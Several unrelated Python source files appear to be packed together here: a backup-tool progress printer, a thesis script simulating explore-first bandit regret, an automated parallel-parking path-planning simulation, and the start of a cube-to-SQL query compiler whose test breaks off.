assert parse_manifest_name("/tmp/manifest-d41d8cd98f00b204e9800998ecf8427e.md5") == ("md5", "d41d8cd98f00b204e9800998ecf8427e")
assert parse_manifest_name("/tmp/manifest-md5.txt") == ("md5", None)
assert parse_manifest_name("/tmp/manifest-sha256.txt") == ("sha256", None)
assert parse_manifest_name("/tmp/tjohej.txt") == (None, None)
assert parse_manifest_name("/tmp/tjohej.md5") == (None, None)
def is_recipe_filename(filename):
    """True iff *filename* has the form "<md5sum>.recipe"."""
    parts = filename.split(".")
    if len(parts) != 2:
        return False
    stem, extension = parts
    return extension == "recipe" and is_md5sum(stem)
class SimpleProgressPrinter:
    """Prints a one-line percentage/spinner progress indicator to *output*.

    Setting the environment variable BOAR_HIDE_PROGRESS=1 prints only
    the label once and silences all further updates.

    NOTE(review): `time`, `printable` and `FakeFile` are not imported in
    this file's visible import lines -- presumably they come in via
    `from common import *`; confirm.
    """
    def __init__(self, output, label = "Processing"):
        self.last_t = 0
        self.start_t = time.time()
        # Becomes True after the first update(); finished() only prints
        # if something was actually reported.
        self.active = False
        self.last_string = ""
        self.label = printable(label); del label
        # Spinner frames, rotated one step per update.
        self.symbols = list('-\\|/')
        self.output = output
        self.updatecounter = 0
        if os.getenv("BOAR_HIDE_PROGRESS") == "1":
            # Only print the label, do nothing else.
            self.output.write(self.label)
            self.output.write("\n")
            self.output = FakeFile()

    def _say(self, s):
        # self.output will point to /dev/null if quiet
        self.output.write(s)
        self.output.flush()

    def update(self, f):
        """Report progress as a fraction *f* in [0, 1]."""
        self.active = True
        self.updatecounter += 1
        now = time.time()
        # Rotate the spinner by one frame.
        symbol = self.symbols.pop(0)
        self.symbols.append(symbol)
        # Blank out the previous line, then redraw over it with \r.
        eraser = (" " * len(self.last_string)) + "\r"
        self.last_string = self.label + ": %s%% [%s]" % (round(100.0 * f, 1), symbol)
        self._say(eraser + self.last_string + "\r")
        #print self.last_string
        self.last_t = now

    def finished(self):
        """Finalize the line (drops the spinner) if anything was printed."""
        if self.active:
            self._say(self.last_string[:-3] + " " + "\n")
|
<reponame>marcosherreroa/Aplicaciones-de-los-algoritmos-bandidos
# -*- coding: utf-8 -*-
"""""
Bandidos estocásticos: introducción, algoritmos y experimentos
TFG Informática
Sección 7.2.9
Figura 14
Autor: <NAME>
"""
import math
import random
import scipy.stats as stats
import matplotlib.pyplot as plt
import numpy as np
def computemExpl(n):
    """Exploration-count heuristic: m = ceil(n^(2/3))."""
    exponent = 2 / 3
    return math.ceil(n ** exponent)
def computemTeor(n, Delta):
    """Theoretical exploration count for explore-first with gap Delta.

    Returns 0 for a zero gap; otherwise at least 1.
    """
    if Delta == 0:
        return 0
    # Same expression (and evaluation order) as the closed-form bound:
    # ceil( 4/Delta^2 * log(n*Delta^2/4) ), clamped below at 1.
    bound = 4 / (Delta * Delta) * math.log(n * Delta * Delta / 4)
    return max(1, math.ceil(bound))
def computemOpt(n, Delta):
    """Numerically minimize the expected regret of explore-first over m.

    Evaluates the expected-regret formula for m = 0..n//2 and returns
    the minimizing m (first index on ties).
    """
    std_normal = stats.norm(0, 1)
    regret = np.empty(n // 2 + 1)
    # m = 0: pick an arm blindly; wrong half the time on average.
    regret[0] = 0.5 * n * Delta
    for m in range(1, n // 2 + 1):
        regret[m] = m * Delta + (n - m) * Delta * std_normal.cdf(-m * Delta / math.sqrt(2 * m))
    return min(range(n // 2 + 1), key=lambda i: regret[i])
def samplePseudoRegretEF(n, k, m, arms, gaps):
    """One Monte Carlo sample of explore-first's pseudo-regret.

    Plays each of the k arms m times, commits to the empirically best
    arm (ties broken uniformly at random) for the remaining rounds, and
    returns the resulting pseudo-regret.
    """
    rwds = [0] * k
    for _ in range(m):
        for j in range(k):
            rwds[j] += arms[j].rvs()
    maximum = max(rwds)
    winners = [j for j in range(k) if rwds[j] == maximum]
    bestarm = random.choice(winners)
    # Exploration cost plus exploitation cost of the chosen arm.
    return m * sum(gaps) + (n - m * k) * gaps[bestarm]
# Experiment: compare three exploration-length choices (m_Expl, m_Teor,
# m_Opt) for explore-first on a two-armed Gaussian bandit, sweeping the
# gap Delta over [0, 1], then plot regret curves and the m values.
n = 1000          # horizon
sampleNum = 1000  # Monte Carlo samples per Delta
arms = 2*[None]
arms[0] = stats.norm(0,1)  # optimal arm: mean 0
gaps = 2*[0]
nDeltas = 40
Deltas = np.linspace(0,1,nDeltas)
regretmExpl = np.zeros(nDeltas)
regretmTeor = np.zeros(nDeltas)
regretmOpt = np.zeros(nDeltas)
C_EP2Min = np.empty(nDeltas)  # theoretical bound curve 2
C_EP3Min = np.empty(nDeltas)  # theoretical bound curve 3
# m_Expl does not depend on Delta; replicate it across the sweep.
mExpl = computemExpl(n)
mExpl = nDeltas*[mExpl]
mTeor = nDeltas*[0]
mOpt = nDeltas*[0]
for i in range(nDeltas):
    Delta = Deltas[i]
    # Suboptimal arm has mean -Delta, so its gap is Delta.
    arms[1]= stats.norm(-Delta,1)
    gaps[1] = Delta
    mTeor[i] = computemTeor(n,Delta)
    mOpt[i] = computemOpt(n,Delta)
    # Average the sampled pseudo-regret over sampleNum runs.
    for k in range(sampleNum):
        regretmExpl[i] += samplePseudoRegretEF(n,2,mExpl[i],arms,gaps)
        regretmTeor[i] += samplePseudoRegretEF(n,2,mTeor[i],arms,gaps)
        regretmOpt[i] += samplePseudoRegretEF(n,2,mOpt[i],arms,gaps)
    regretmExpl[i] /= sampleNum
    regretmTeor[i] /= sampleNum
    regretmOpt[i] /= sampleNum
    # Closed-form upper bounds for comparison with the empirical curves.
    if Delta == 0:
        C_EP2Min[i] = 0
    else:
        C_EP2Min[i] = min(n*Delta,Delta+4/Delta*(1+max(0,math.log(n*Delta*Delta/4))))
    C_EP3Min[i] = (Delta+math.sqrt(2)*math.exp(-1/2))*math.ceil(n**(2/3))
# Figure 1: expected regret vs Delta for the three strategies + bounds.
fig = plt.figure()
plt.plot(Deltas,regretmExpl,color='tab:red',label='EP (m=m_Expl)')
plt.plot(Deltas,regretmTeor, color='tab:green',label = 'EP (m = m_Teor)')
plt.plot(Deltas,regretmOpt, color='tab:blue', label = 'EP (m = m_Opt)')
plt.plot(Deltas,C_EP2Min,'--', color='tab:green',label= 'C_EP2_min')
plt.plot(Deltas,C_EP3Min,'--',color='tab:red',label='C_EP3_min')
plt.xlabel('∆')
plt.ylabel('Remordimiento esperado')
plt.ylim(0,80)
plt.legend(loc='upper right')
fig.savefig('EFExpDeltaRegret.pdf',format='pdf')
plt.show()
# Figure 2: the exploration lengths themselves as functions of Delta.
fig = plt.figure()
plt.plot(Deltas, mExpl, color='tab:red', label = 'm_Expl')
plt.plot(Deltas, mTeor, color='tab:green', label = 'm_Teor')
plt.plot(Deltas,mOpt, color = 'tab:blue', label = 'm_Opt')
plt.xlabel('∆')
plt.ylabel('m')
plt.legend(loc='upper right')
fig.savefig('ms.pdf',format='pdf')
plt.show()
|
<reponame>ztq1521367/APA
import numpy as np
import matplotlib.pyplot as plt
from scipy import linalg
import math
import time
from threading import Thread
import pdb
import random
import copy
import re
"""
输入:车位宽度,车辆起始点,最小停车位宽度,车距离车位的最短距离和最长距离(这个可以根据具体车型事先计算好)
输出:计算避障点坐标,终止点坐标,以及每个控制点的航向角,避障点可以有多个:驶离车位时右前角,驶出车位时右后角;
根据控制点的约束条件,解线性方程组,得到多项式系数,拟合曲线,确认各个控制点对应的坐标是否满足约束要求,曲线曲率是否满足要求。
如果不满足,采用多段路径进行规划,
最后规划出符合要求的路径。
"""
# Parallel ("horizontal") parking.
# Parameter coefficients, unit: meters (angles in degrees).
safeDistance = 0.2  # safety margin
minParkLen = 6.6  # minimum parking-slot length
minDiffWidth = 1  # minimum lateral distance from car to slot
carWidth = 1.85  # car width
carLen = 4.85  # car length (original comment said "height" -- likely a typo)
rearLen = 1.0  # rear overhang
frontLen = 1.0  # front overhang
axialLen = 1.5  # axle length (track width)
axialDistance = 2.8  # wheelbase
maxWheelAngle = 40  # maximum wheel steering angle
zPointX = 2.9  # obstacle-avoidance point, x coordinate
zPointY = -0.91  # obstacle-avoidance point, y coordinate
zAngle = 30  # heading angle at the avoidance point
carSize = [4.8, 1.8]
# Body corner points in the rear-axle coordinate frame:
rrp = [-rearLen, -carSize[1]/2]  # right rear
lrp = [-rearLen, carSize[1]/2]  # left rear
lfp = [axialDistance+frontLen, carSize[1]/2]  # left front
rfp = [axialDistance+frontLen, -carSize[1]/2]  # right front
stopFlag = False
hxAngle = 0  # current heading angle
raxPoint = [0,0]  # rear-axle center point
class car:
    """
    Vehicle information (dimensions and steering limits).
    """
    def __init__(self, carWidth, carLen, frontLen, rearLen, axialLen, axialDistance, maxWheelAngle):
        self.width = carWidth  # car width
        self.height = carLen  # car length (stored as "height" in the original)
        self.frontLen = frontLen  # front overhang
        self.rearLen = rearLen  # rear overhang
        self.axialLen = axialLen  # axle length (track width)
        self.axialDistance = axialDistance  # wheelbase
        self.maxWheelAngle = maxWheelAngle  # maximum wheel steering angle
class contrlPoint:
    """
    Control-point information: start point, obstacle-avoidance (barrier)
    point and end point, each with position and heading angle.
    """
    def __init__(self, startX, startY, startAngle, barrierX, barrierY, barrierAngle, endX, endY, endAngle):
        self.startX = startX
        self.startY = startY
        self.startAngle = startAngle
        self.barrierX = barrierX
        self.barrierY = barrierY
        self.barrierAngle = barrierAngle
        self.endX = endX
        self.endY = endY
        self.endAngle = endAngle
def calAvoidBarrierPoint(parkL, parkW, carInfo):
    """Compute the obstacle-avoidance point and its heading angle.

    parkL: parking-slot length
    parkW: parking-slot width
    carInfo: vehicle parameters (dimensions, wheelbase, axle length, ...)

    NOTE: currently returns hard-coded placeholder values (the original
    body is a TODO); the parameters are not used yet.
    """
    # TODO: derive these from parkL, parkW and carInfo.
    barrierX, barrierY = 2.9, -1.
    barrierAngle = 0.43633  # previously tried values: 0.523333, 0.35
    return barrierX, barrierY, barrierAngle
def calContrlPoint(params):  # parkL, parkW, startX, startY, startAngle):
    """Assemble the control-point dictionary for path planning.

    Copies the nine control-point fields (start / barrier / end, each
    with x, y and heading angle) out of *params* into a new dict.
    """
    fields = ('startX', 'startY', 'startAngle',
              'barrierX', 'barrierY', 'barrierAngle',
              'endX', 'endY', 'endAngle')
    return dict((field, params[field]) for field in fields)
def solve(ctrlPoint, ifAvoid, ax):
    """Fit a polynomial path y(x) through the control points.

    Solves for the coefficients of y = a_n*x^n + ... + a_0 such that the
    curve passes through each control point and has the required heading
    there (dy/dx = tan(angle)).  With the avoidance point included a
    quintic is used (6 conditions, exact solve); without it a quartic
    (4 conditions, least-squares / minimum-norm).

    Args:
        ctrlPoint: dict with startX/Y/Angle, barrierX/Y/Angle, endX/Y/Angle.
        ifAvoid: 'yes' to include the obstacle-avoidance waypoint.
        ax: matplotlib axis (unused; kept for interface compatibility).

    Returns:
        Array of polynomial coefficients, highest degree first.
    """
    waypoints = [(ctrlPoint['startX'], ctrlPoint['startY'], ctrlPoint['startAngle'])]
    if ifAvoid == 'yes':
        degree = 5
        waypoints.append((ctrlPoint['barrierX'], ctrlPoint['barrierY'], ctrlPoint['barrierAngle']))
    else:
        # two control points only -> quartic system
        degree = 4
    waypoints.append((ctrlPoint['endX'], ctrlPoint['endY'], ctrlPoint['endAngle']))

    rows = []
    rhs = []
    for x, y, angle in waypoints:
        # value constraint: sum_p a_p * x^p = y
        rows.append([pow(x, p) for p in range(degree, -1, -1)])
        rhs.append(y)
        # slope constraint: sum_p p * a_p * x^(p-1) = tan(angle)
        rows.append([p * pow(x, p - 1) for p in range(degree, 0, -1)] + [0])
        rhs.append(math.tan(angle))

    A = np.array(rows)
    B = np.array(rhs)
    X = linalg.lstsq(A, B)  # least-squares solve (handles the overdetermined/quartic case)
    return X[0]
def carMove(tyreAngle = 0, speed = 0, line = None, line1 = None, clearFlag = None):
    """
    Simulate one step of car motion (bicycle-model kinematics).

    tyreAngle: front-wheel steering angle (rad); speed: speed command for
    this step; line/line1: matplotlib Line2D objects for the rear-axle
    track and the car outline; clearFlag: True resets the accumulated
    track history.

    Mutates the module-level pose (hxAngle, raxPoint) and returns the
    signed distance moved this step.
    """
    global rrp, lfp, lrp, rfp, carSize, axialDistance, hxAngle, raxPoint
    cta = -tyreAngle #*0.017444444
    s = -speed * 10  # step distance derived from the speed command
    if cta != 0:
        # Steering: move along a circular arc around the turn centre.
        r1 = axialDistance/math.tan(cta)
        r = r1 + carSize[1]/2
        moveAngle = s / r  # arc angle swept this step
        # turn-centre coordinates with the mid-axle point as origin
        rax0Circle = [0, -r]
        # turn centre rotated by the current heading angle
        sinHxAngle = math.sin(hxAngle)
        cosHxAngle = math.cos(hxAngle)
        rax0HxCircle = [rax0Circle[0]*cosHxAngle-rax0Circle[1]*sinHxAngle, rax0Circle[0]*sinHxAngle+rax0Circle[1]*cosHxAngle]
        # with the rotated turn centre as origin, rotate by the arc angle
        sinMoveAngle = math.sin(moveAngle)
        cosMoveAngle = math.cos(moveAngle)
        rax0HxCircleO = [-rax0HxCircle[0]*cosMoveAngle+rax0HxCircle[1]*sinMoveAngle, -rax0HxCircle[0]*sinMoveAngle-rax0HxCircle[1]*cosMoveAngle]
        raxPoint = [rax0HxCircleO[0]+rax0HxCircle[0]+raxPoint[0], rax0HxCircleO[1]+rax0HxCircle[1]+raxPoint[1]]
        hxAngle += moveAngle
        sinHxAngle = math.sin(hxAngle)
        cosHxAngle = math.cos(hxAngle)
        # rotate the four outline corners by the new heading and translate
        rrpm = [(rrp[0]*cosHxAngle-rrp[1]*sinHxAngle + raxPoint[0]), (rrp[0]*sinHxAngle+rrp[1]*cosHxAngle + raxPoint[1])]
        lrpm = [(lrp[0]*cosHxAngle-lrp[1]*sinHxAngle + raxPoint[0]), (lrp[0]*sinHxAngle+lrp[1]*cosHxAngle + raxPoint[1])]
        lfpm = [(lfp[0]*cosHxAngle-lfp[1]*sinHxAngle + raxPoint[0]), (lfp[0]*sinHxAngle+lfp[1]*cosHxAngle + raxPoint[1])]
        rfpm = [(rfp[0]*cosHxAngle-rfp[1]*sinHxAngle + raxPoint[0]), (rfp[0]*sinHxAngle+rfp[1]*cosHxAngle + raxPoint[1])]
        XX = [rrpm[0], lrpm[0], lfpm[0], rfpm[0], rrpm[0]]
        YY = [rrpm[1], lrpm[1], lfpm[1], rfpm[1], rrpm[1]]
    else:
        # No steering: translate straight along the current heading.
        sinHxAngle = math.sin(hxAngle)
        cosHxAngle = math.cos(hxAngle)
        raxPoint = [raxPoint[0]-cosHxAngle*s, raxPoint[1]-sinHxAngle*s]
        rrpm = [rrp[0]*cosHxAngle-rrp[1]*sinHxAngle + raxPoint[0], rrp[0]*sinHxAngle+rrp[1]*cosHxAngle + raxPoint[1]]
        lrpm = [lrp[0]*cosHxAngle-lrp[1]*sinHxAngle + raxPoint[0], lrp[0]*sinHxAngle+lrp[1]*cosHxAngle + raxPoint[1]]
        lfpm = [lfp[0]*cosHxAngle-lfp[1]*sinHxAngle + raxPoint[0], lfp[0]*sinHxAngle+lfp[1]*cosHxAngle + raxPoint[1]]
        rfpm = [rfp[0]*cosHxAngle-rfp[1]*sinHxAngle + raxPoint[0], rfp[0]*sinHxAngle+rfp[1]*cosHxAngle + raxPoint[1]]
        XX = [rrpm[0], lrpm[0], lfpm[0], rfpm[0], rrpm[0]]
        YY = [rrpm[1], lrpm[1], lfpm[1], rfpm[1], rrpm[1]]
    # Track history is kept as a function attribute (persists across calls).
    if not hasattr(carMove, 'raxList'):
        carMove.raxList = [[],[]]
    if clearFlag is False:
        carMove.raxList[0].append(raxPoint[0])
        carMove.raxList[1].append(raxPoint[1])
        line.set_data(carMove.raxList[0],carMove.raxList[1])
        line1.set_data(XX,YY)
    else:
        # reset the track and start it at the current position
        carMove.raxList = [[],[]]
        carMove.raxList[0].append(raxPoint[0])
        carMove.raxList[1].append(raxPoint[1])
    #ax.plot(raxPoint[0],raxPoint[1],color='m',linestyle='',marker='o')
    return s
def notTimeCtrl(thetar,theta, yr, y, curvature):
    """
    Non-time-reference path-tracking control law.

    thetar/theta: reference and actual heading (rad); yr/y: reference and
    actual lateral position; curvature: curvature of the reference path at
    the current point.  Returns the steering command clamped to +/-maxAngle.
    """
    k1 = 20 #200 #180  lateral-error gain
    k2 = 10 #100 #160  heading-error gain (-k2 when reversing, +k2 forward)
    maxAngle = 0.698131689  # steering limit (40 degrees in radians)
    geometry = axialDistance*pow(math.cos(theta), 3)
    feedback = k1*(yr-y)-k2*(math.tan(thetar)-math.tan(theta))
    feedforward = curvature/((math.cos(thetar)**2)*math.cos(theta))
    outCtrl = geometry * (feedback + feedforward)
    # clamp to the physical steering limit
    outCtrl = max(-maxAngle, min(maxAngle, outCtrl))
    print('outCtrl: ', outCtrl)
    return outCtrl
def pointXz(param, xzAlg):
    """Rotate all control points in *param* by xzAlg radians about the origin.

    Returns a deep copy of *param* with startX/Y, barrierX/Y and endX/Y
    rotated and xzAlg added to each heading angle; the input dict is left
    unchanged.
    """
    cosVal = math.cos(xzAlg)
    sinVal = math.sin(xzAlg)
    rotated = copy.deepcopy(param)
    for prefix in ('start', 'barrier', 'end'):
        x = param[prefix + 'X']
        y = param[prefix + 'Y']
        rotated[prefix + 'X'] = x * cosVal - y * sinVal
        rotated[prefix + 'Y'] = x * sinVal + y * cosVal
        rotated[prefix + 'Angle'] += xzAlg
    return rotated
def mulPointCtrl(theta, thetaq, x, xq, y, yq, flag):
    """
    Multi-point (target-pose) control law.

    theta/thetaq: actual and target heading; (x, y)/(xq, yq): actual and
    target position; flag selects the sign of the heading term (the caller
    passes True when the commanded speed is non-negative).
    Returns the steering command clamped to +/-maxAngle.
    """
    k3 = 20  # lateral-error gain
    k4 = 10  # heading-error gain
    maxAngle = 0.698131689  # steering limit (40 degrees in radians)
    # lateral and heading error expressed in the target frame
    ye = (y - yq) * math.cos(thetaq) - (x - xq) * math.sin(thetaq)
    thetae = theta - thetaq
    gain = pow(math.cos(thetae), 3) * axialDistance
    headingTerm = k4 * math.tan(thetae)
    if flag is True:
        error = -k3 * ye - headingTerm
    else:
        error = -k3 * ye + headingTerm
    outCtrl = math.atan(gain * error)
    # clamp to the physical steering limit
    return max(-maxAngle, min(maxAngle, outCtrl))
def apaTest(adaptationParam, mvSpeed, sleepFlag, ctrlFlag):
    """
    Parallel parking-slot simulation loop.

    adaptationParam: (startInfo, endInfo, line, line1, line2[, p1, xlp, xlp2])
        where startInfo/endInfo are [x, y, heading], the line* are
        matplotlib Line2D objects, and p1/xlp/xlp2 are the fitted path
        polynomial and its first/second derivative callables (only when
        ctrlFlag is True).
    mvSpeed: speed command (negative = reverse).
    sleepFlag: True to sleep 1 ms per step (animation pacing).
    ctrlFlag: True -> path-tracking control (notTimeCtrl); False -> target
        pose control (mulPointCtrl).

    Mutates the module-level pose (raxPoint, hxAngle); loops until the car
    reaches the target x or stopFlag is set.  Returns (conDiff, angleDiff)
    (currently always (0, 0)).
    """
    global hxAngle, raxPoint, safeDistance, rearLen, stopFlag
    #pdb.set_trace()  # debug
    startInfo = adaptationParam[0]
    endInfo = adaptationParam[1]
    lineTmp = adaptationParam[2]
    lineTmp1 = adaptationParam[3]
    lineTmp2 = adaptationParam[4]
    if ctrlFlag is True:
        p1 = adaptationParam[5]
        xlp = adaptationParam[6]
        xlp2 = adaptationParam[7]
    outCtrl = 0
    # initialise the simulated pose at the start point
    raxPoint[0] = startInfo[0]
    raxPoint[1] = startInfo[1]
    hxAngle = startInfo[2]
    conDiff = 0
    angleDiff = 0
    mvs = 0
    if ctrlFlag is False:
        # direction flag for the target-pose controller
        if mvSpeed < 0:
            dirFlag = False
        else:
            dirFlag = True
    clearFlag = True
    angleChange = []
    xChange = []
    distance = math.sqrt((raxPoint[0]-endInfo[0])**2 + (raxPoint[1]-endInfo[1])**2)
    constSpeed = mvSpeed
    while 1:
        if raxPoint[0] <= endInfo[0]: #mvs >= 8.0: # >= startP[0]: #
            break
        if stopFlag is True:
            break
        # slow down proportionally over the final third of the distance
        tmp = math.sqrt((raxPoint[0]-endInfo[0])**2 + (raxPoint[1]-endInfo[1])**2)
        tmpConst = distance/3
        if tmp <= tmpConst:
            tmp3 = tmp/tmpConst
            if tmp3 < 0.05:
                constSpeed = 0.05*mvSpeed
            else:
                constSpeed = tmp3*mvSpeed
        if ctrlFlag is True:
            curY = p1(raxPoint[0])
            # heading-angle reference from the path slope
            curAngle = math.atan(xlp(raxPoint[0]))
            ydf1 = xlp(raxPoint[0])
            ydf2 = xlp2(raxPoint[0])
            # curvature of the ideal path at the current x
            k = ydf2 / pow(1 + pow(ydf1,2), 1.5)
            outCtrl = notTimeCtrl(curAngle, hxAngle, curY, raxPoint[1], k)
            # track the maximum curvature seen (function-attribute state)
            if not hasattr(apaTest, 'maxK'):
                apaTest.maxK = [0,0]
            if apaTest.maxK[0] < abs(k):
                apaTest.maxK = [abs(k), raxPoint[0]]
                print('maxK: ', apaTest.maxK)
        else:
            outCtrl = mulPointCtrl(hxAngle, endInfo[2], raxPoint[0], endInfo[0], raxPoint[1], endInfo[1], dirFlag)
        xChange.append(raxPoint[0])
        angleChange.append(outCtrl)
        lineTmp2.set_data(xChange,angleChange)
        mvs += abs(carMove(tyreAngle = outCtrl, speed = constSpeed, line = lineTmp, line1 = lineTmp1, clearFlag = clearFlag))#-0.000833333
        clearFlag = False
        plt.draw()
        #pdb.set_trace()  # debug
        if sleepFlag is True:
            time.sleep(0.001)
    return conDiff, angleDiff
def ycBegin(params, ax, ax1):
    '''
    Run one planning + simulation pass (started in a worker thread).

    params: scenario dict (control points, rotation angle 'xzAlg', speed
    'carSpeed' and controller selection 'ctrlType').
    ax/ax1: matplotlib axes for the steering plot and the path plot.
    '''
    global safeDistance,rearLen
    # initialise the plot lines
    line, = ax1.plot([], [], '-', linewidth=1, color='r')
    line1, = ax1.plot([], [], '-', linewidth=1, color='g')
    line2, = ax1.plot([], [], '-', linewidth=1, color='b')
    line3, = ax.plot([], [], '-', linewidth=1, color='b')
    # path fitting
    p1 = []
    xlp = []
    xlp2 = []
    xzAlg = params['xzAlg'] #-0.436332306 #0.523598767
    ctrlPointTmp = calContrlPoint(params)
    # rotate control points to avoid tan() singularities near +/-90 deg
    ctrlPoint = pointXz(ctrlPointTmp, xzAlg)
    ifAvoid = 'yes'
    plotCoeff = solve(ctrlPoint, ifAvoid, ax1)
    # polynomial and its first/second derivatives (quintic coefficients)
    p1.append(np.poly1d(plotCoeff))
    xlp.append(lambda x: 5*plotCoeff[0]*pow(x,4) + 4*plotCoeff[1]*pow(x,3) + 3*plotCoeff[2]*pow(x,2) + 2*plotCoeff[3]*x + plotCoeff[4])
    xlp2.append(lambda x: 20*plotCoeff[0]*pow(x,3) + 12*plotCoeff[1]*pow(x,2) + 6*plotCoeff[2]*x + 2*plotCoeff[3])
    startInfo = [ctrlPoint['startX'], ctrlPoint['startY'], ctrlPoint['startAngle']]
    endInfo = [ctrlPoint['endX'], ctrlPoint['endY'], ctrlPoint['endAngle']]
    if params['ctrlType'] is False:
        # path-tracking mode: draw the fitted path and track it
        xx = np.arange(ctrlPoint['endX'], ctrlPoint['startX'], 0.01)
        pp1=p1[0](xx)
        drawP = [[ctrlPoint['startX'], ctrlPoint['barrierX'], ctrlPoint['endX']], [ctrlPoint['startY'], ctrlPoint['barrierY'], ctrlPoint['endY']]]
        ax1.plot(drawP[0],drawP[1],color='b',linestyle='',marker='.',label=u'lhdata')
        line2.set_data(xx,pp1)
        apaTest((startInfo, endInfo, line, line1, line3, p1[0], xlp[0], xlp2[0]), params['carSpeed'], True, True)
    else:
        # target-pose mode: only start and end points are used
        drawP = [[startInfo[0], endInfo[0]], [startInfo[1], endInfo[1]]]
        ax1.plot(drawP[0],drawP[1],color='b',linestyle='',marker='.',label=u'lhdata')
        apaTest((startInfo, endInfo, line, line1, line3), params['carSpeed'], True, False)
def main(params):
    """Set up the two plot axes, run the simulation in a worker thread and
    show the matplotlib window; closing the window sets stopFlag so the
    worker loop terminates."""
    global stopFlag
    fig = plt.figure(figsize = [20,8])
    # left axis: steering command vs x
    ax = fig.add_subplot(1,2,1,xlim=(0, 10), ylim=(-1, 1))
    ax.set_xticks(np.arange(0, 10, 1))
    ax.set_yticks(np.arange(-1, 1, 0.1))
    # right axis: planned path and car outline
    ax1 = fig.add_subplot(1,2,2,xlim=(0, 10), ylim=(-5, 5))
    ax1.set_xticks(np.arange(0, 10, 1))
    ax1.set_yticks(np.arange(-5, 5, 1))
    ax.grid(True)
    ax1.grid(True)
    t = Thread(target = ycBegin, args=(params, ax, ax1))
    t.start()
    plt.show()  # blocks until the window is closed
    stopFlag = True
if __name__ == '__main__':
    # Alternative scenario dicts are kept below as (inactive) string
    # literals; only one 'params' assignment is active at a time.
    '''
    #多点控制
    params = {
        'parkL': 7.5,
        'parkW': 3,
        'endX': 7.5, #6.5, #7.5,
        'endY': 5.4, #1.6, #1.0,
        'endAngle': 1.5707963, #0.0,
        'barrierX': 2.9,
        'barrierY': -1,
        'barrierAngle': 0.43633,
        'startX':7.1,#1.5,
        'startY':1.4,#-4.0,
        'startAngle':1.5707963, #1.221730456
        'xzAlg':0.0,
        'carSpeed':-0.001388889, #5km/h
        'ctrlType':True
    }
    '''
    # Parallel (side) parking scenario
    params = {
        'parkL': 7.5,
        'parkW': 3,
        'startX': 8.5, #6.5, #7.5,
        'startY': 1.4, #1.6, #1.0,
        'startAngle': 0.0, #0.0,
        'barrierX': 2.9,
        'barrierY':-1,
        'barrierAngle': 0.43633,
        'endX':1.2,#1.5,
        'endY':-1.5,#-4.0,
        'endAngle':0, #1.221730456
        'xzAlg':0.0,
        'carSpeed':-0.001388889, #5km/h
        'ctrlType':False
    }
    '''
    #垂直泊车
    params = {
        'parkL': 7.5,
        'parkW': 3,
        'startX': 8.5, #7.5,
        'startY': 2.0, #1.0,
        'startAngle': 0.0, #0.0,
        'barrierX': 5.5,
        'barrierY': 0.4,
        'barrierAngle': 0.8, #1.221730456,
        'endX':4,#1.5,
        'endY':-6,#-4.0,
        'endAngle':1.5707963, #1.221730456
        'xzAlg':-0.436332306, #旋转一定角度,避免计算tan时异常
        'carSpeed':-0.001388889, #5km/h
        'ctrlType':False
    }
    '''
    '''
    #斜方位泊车
    params = {
        'parkL': 7.5,
        'parkW': 3,
        'startX': 8.5, #7.5,
        'startY': 1.0, #1.0,
        'startAngle': 0.0, #0.0,
        'barrierX': 5.5,
        'barrierY': -0.2,
        'barrierAngle': 0.8, #1.221730456,
        'endX':3,#1.5,
        'endY':-5,#-4.0,
        'endAngle':1.221730456, #1.221730456
        'xzAlg':-0.0, #旋转一定角度,避免计算tan时异常
        'carSpeed':-0.001388889, #5km/h
        'ctrlType':False
    }
    '''
    main(params)
|
import json
import logging
from pathlib import Path
from textwrap import dedent
import chevron
import yaml
import users
from spec import Cube, Query, MeasureType, Spec
class CubeCompiler:
    """Compiles a Query against a single Cube definition into a SQL string.

    Column aliases are built as <cube-alias>_<field-name>; measure/dimension
    SQL fragments are mustache templates rendered with chevron.
    """
    def __init__(self, name: str, cube: Cube):
        self.name = name  # alias for the cube's subquery and column prefix
        self.cube = cube
    def compile(self, query: Query):
        """Render the full SELECT statement for *query*.

        NOTE(review): GROUP BY emits 0-based column ordinals (enumerate
        starts at 0) while SQL ordinals are 1-based — looks like a latent
        bug, but the exact output is pinned by the asserts in test_users().
        """
        measure_columns = []
        dimension_columns = []
        for name in query.measures:
            sql = self.compile_measure(self.cube.measures[name])
            sql = f'{sql} {self.name}_{name}'  # append the column alias
            measure_columns.append(sql)
        for name in query.dimensions:
            sql = self.compile_dimension(self.cube.dimensions[name])
            sql = f'{sql} {self.name}_{name}'
            dimension_columns.append(sql)
        return dedent(f'''\
        SELECT
          {", ".join(dimension_columns)},
          {", ".join(measure_columns)}
        FROM ({self.cube.sql}) AS {self.name}
        GROUP BY {", ".join([str(i) for i, _ in enumerate(dimension_columns)])}
        ''')
    def compile_measure(self, measure, depth=3):
        """Render a measure to SQL: apply its filters as a CASE guard, then
        wrap with the aggregate implied by its type (COUNT -> count(...))."""
        sql = self.render(measure.sql, depth)
        if measure.filters:
            filters = [self.render(filter.sql, depth) for filter in measure.filters]
            sql = f'CASE WHEN ({" AND ".join(filters)}) THEN {sql} END'
        match measure.type:
            case MeasureType.COUNT:
                sql = f'count({sql})'
            case MeasureType.NUMBER:
                pass  # NUMBER measures are emitted as-is
        return sql
    def compile_dimension(self, dimension, depth=3):
        """Render a dimension's SQL template (no aggregation)."""
        sql = self.render(dimension.sql, depth)
        return sql
    def render(self, template: str, depth: int):
        """Render a mustache template, exposing CUBE and every measure.

        Measures may reference each other; *depth* bounds the recursion.
        NOTE(review): on exhaustion the literal string 'recursion depth
        exceeded' is substituted into the SQL rather than raising.
        """
        if depth == 0:
            return 'recursion depth exceeded'
        data = {
            'CUBE': self.name
        }
        for name, measure in self.cube.measures.items():
            data[name] = self.compile_measure(measure, depth - 1)
        return chevron.render(template, data)
class SpecCompiler:
    """Compiles queries against a whole spec by delegating to a
    per-cube CubeCompiler."""
    def __init__(self, spec: Spec):
        self.spec = spec
    def compile(self, query: Query):
        """Render the SQL for *query* using its cube's compiler."""
        cube = self.spec[query.cube]
        compiler = CubeCompiler(query.cube.lower(), cube)
        return compiler.compile(query)
def test_users():
    """End-to-end check of the example 'Users' cube: serialises the spec
    (compared against users.json on disk) and pins the exact SQL emitted
    for three representative queries."""
    # https://cube.dev/docs/schema/getting-started
    dict0 = {name: cube.dict(exclude_unset=True) for name, cube in users.spec.items()}
    json0 = json.dumps(dict0, indent=2)
    print(json0)
    yaml0 = yaml.dump(dict0, indent=2)
    print(yaml0)
    # golden-file comparison; requires users.json in the working directory
    assert json0 == Path('users.json').read_text()
    compiler = SpecCompiler(users.spec)
    # plain COUNT with two dimensions
